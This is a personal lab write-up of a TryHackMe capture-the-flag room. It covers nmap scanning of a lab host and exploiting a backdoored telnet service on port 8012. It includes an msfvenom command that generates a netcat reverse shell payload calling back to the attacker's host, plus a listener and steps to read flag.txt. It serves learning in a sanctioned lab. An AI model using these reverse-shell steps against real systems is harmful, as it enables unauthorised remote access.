- Purpose: Document my experience and share knowledge on the Cyber Defense challenges
- Scope: Learn the fundamental components of detecting and responding to threats in a corporate environment
- Environment: Kali Linux via VirtualBox
- Accounts and Access: Created a TryHackMe account and accessed the room via OpenVPN
- Objective: Access the target's assets by exploiting vulnerable services to access valuable data
- Initial Scanning:
-
Tools and Commands:
- Port Scanning:
nmap -A 10.10.177.199- Shows that the top 1000 ports are not open
nmap -A -p 8000-9000 10.10.177.199-vv- Scanned ports between 8000-9000 and discovered an open port 8012/tcp
- Scanned ports between 8000-9000 and discovered an open port 8012/tcp
- Port Scanning:
-
Findings: The open port is 8012 A possible username might be Skidy - Service might be a backdoor
-
-
Vulnerability Identification: Telnet vulnerability
- Techniques Used: Exploit using netcat reverse shell payload in the telnet server
-
Exploitation Process:
-
Enter
telnet 10.10.177.199 8012now you can connect to the telnet server using the discovered port 8012 -
Enter
msfvenom -p cmd/unix/reverse_netcat lhost=10.17.64.194 lport=4444 Rto generate a reverse shell payload using msfvenom -
Enter
nc -lvp 4444to start netcat lister to listen for inbound connection and see data -
Copy the payload into the telnet server CLI and press enter
-
Go to the netcat lister and enter
lsit will show the file flag.txt -
Enter
cat flag.txtto capture the flag
- Challenges Faced: Error with my configuration of kali and openvpn not being able to connect to the server
- Learnings: I Learned that telnet is unsecured because it has a lot of vulnerabilities when I checked CVE
- Improvements: Familiarize with the commands
- Summary: Successfully gained access to the telnet server by exploiting its vulnerability and using reverse shell payload to capture the flag
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent